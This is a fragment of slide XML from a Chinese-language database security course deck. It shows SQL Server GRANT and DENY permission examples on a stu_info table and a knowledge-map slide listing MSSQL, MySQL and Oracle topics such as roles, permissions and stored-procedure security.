            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>GRANT SELECT,INSERT,UPDATE,DELETE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>ON </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1"/>
              <a:t>stu_info</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>TO Monitor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>GO</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>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权限管理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4290227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700808"/>
            <a:ext cx="10972800" cy="4608512"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>拒绝权限</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>拒绝权限可以在授予用户指定的操作权限之后，根据需要暂时停止用户对指定数据库对象的访问或操作</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>格式如下：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>DENY { ALL [ PRIVILEGES] | permission [ ( column [,…n]) [,…n] [ON [ CLASS : : ] securable ] TO principal [,…n] [WITH GRANT OPTION [AS principal]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>示例如下：拒绝</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>guest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>用户对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>数据库中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1"/>
              <a:t>stu_info</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>表的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>INSERT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>DELETE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>权限</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>USE test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>DENY INSERT,DELETE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>ON </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1"/>
              <a:t>stu_info</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>TO guest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>GO</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>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权限管理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="129448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A2350-A4CA-4373-935A-63772E832868}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="274638"/>
            <a:ext cx="10972800" cy="490066"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>知识体系</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="灯片编号占位符 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96FAB31A-5402-420F-B6A4-743D2BD3442E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4191000" y="6505575"/>
            <a:ext cx="838200" cy="261938"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>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8257DB9-2D9E-4A4D-AE3F-C5CFAF25B303}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Line 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70C0E0B1-2CEF-4E8A-A6E9-1C1DE39EF6C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3575720" y="1259977"/>
            <a:ext cx="13844" cy="4824027"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="AutoShape 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BEF6BB8-2BBF-42C6-8FC9-65BEA9FA5E95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1216131" y="2420888"/>
            <a:ext cx="2148832" cy="64770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anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="040404"/>
                </a:solidFill>
              </a:rPr>
              <a:t>关系型数据库</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Text Box 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5315387B-A121-41E4-A26E-1DF421955550}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1847528" y="6005323"/>
            <a:ext cx="1092193" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B01302"/>
                </a:solidFill>
              </a:rPr>
              <a:t>知识体</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Text Box 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E7900A6-F52A-4BCC-8952-E8EB1BCB75E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4295800" y="6011996"/>
            <a:ext cx="1092193" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B01302"/>
                </a:solidFill>
              </a:rPr>
              <a:t>知识域</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="Line 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02868999-2CA2-45EA-9142-0858C04B4B42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5902284" y="1278560"/>
            <a:ext cx="30185" cy="4805443"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="AutoShape 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{036ACB4F-0A6D-40DC-8EEF-0102C6912C73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4055277" y="1278561"/>
            <a:ext cx="1666991"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en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mssql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>数据库</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Text Box 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E618A23A-6AB2-4AC5-A777-D8FE65AF0AFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6888088" y="6011996"/>
            <a:ext cx="1435286" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B01302"/>
                </a:solidFill>
              </a:rPr>
              <a:t>知识子域</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="60" name="Group 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6278209-8ED9-4970-BD57-70D02EB71DC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6538031" y="889353"/>
            <a:ext cx="2408657" cy="418794"/>
            <a:chOff x="535" y="663"/>
            <a:chExt cx="1142" cy="272"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="61" name="Group 43">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{065B06FA-6871-44DE-A3C6-363302592C6F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="535" y="663"/>
              <a:ext cx="1139" cy="272"/>
              <a:chOff x="2272" y="1479"/>
              <a:chExt cx="1363" cy="1800"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="63" name="AutoShape 44">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07720B4A-D5EF-4B15-B1D1-D4F97DEB77CF}"/>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64" name="AutoShape 45">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4152E881-90A2-41B0-97E7-459CE69D1C0E}"/>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65" name="AutoShape 46">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{181ABE19-D35B-48C4-ADEA-B3375E88790A}"/>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66" name="AutoShape 47">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D84E8B8-7BF3-4385-90F6-F9CAA8C3230E}"/>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62" name="Rectangle 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{530ECB27-AD97-4684-8A6E-4EB9E23811F6}"/>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en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="040404"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Mssql</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="040404"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>角色与权限</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="040404"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="AutoShape 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FE86F47-3874-4BDC-97DF-FC5C882B7183}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4055277" y="2550498"/>
            <a:ext cx="1716687"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en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>数据库</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="AutoShape 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DD893FE-E0E8-404B-802C-101A0F8C022A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4055848" y="3964331"/>
            <a:ext cx="1710888"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en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Oracle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>数据库</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="AutoShape 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8FDD243-8B33-4754-A34F-522B773AF5A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3665063" y="1484784"/>
            <a:ext cx="336147" cy="2736304"/>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85" name="AutoShape 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFFB03ED-4C43-4EF0-A7AE-CFEC527E7215}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6065409" y="1091778"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="91" name="Group 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56C4A35F-84D8-49D2-9E76-FCB53ABE5F68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6529419" y="1637110"/>
            <a:ext cx="2630692" cy="418794"/>
            <a:chOff x="535" y="663"/>
            <a:chExt cx="1231" cy="272"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="92" name="Group 43">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C8D6737-A6B1-40C4-95D2-6EBF1B7DB725}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="535" y="663"/>
              <a:ext cx="1139" cy="272"/>
              <a:chOff x="2272" y="1479"/>
              <a:chExt cx="1363" cy="1800"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="94" name="AutoShape 44">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5680350F-C08D-45A8-9687-947CA4C12601}"/>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95" name="AutoShape 45">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C3CDA9E-AD23-40FB-A8A1-A793DE2EE670}"/>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96" name="AutoShape 46">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B630B21-9A1F-4C17-8507-06E9509E552B}"/>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97" name="AutoShape 47">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31B07777-86CF-434E-8CFD-24DCAA1ADF11}"/>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93" name="Rectangle 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BDDE908-1DA1-4BFD-AD5D-451216E339C0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="586" y="663"/>
              <a:ext cx="1180" cy="240"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="040404"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Mssql</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="040404"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>存储过程安全</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="040404"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
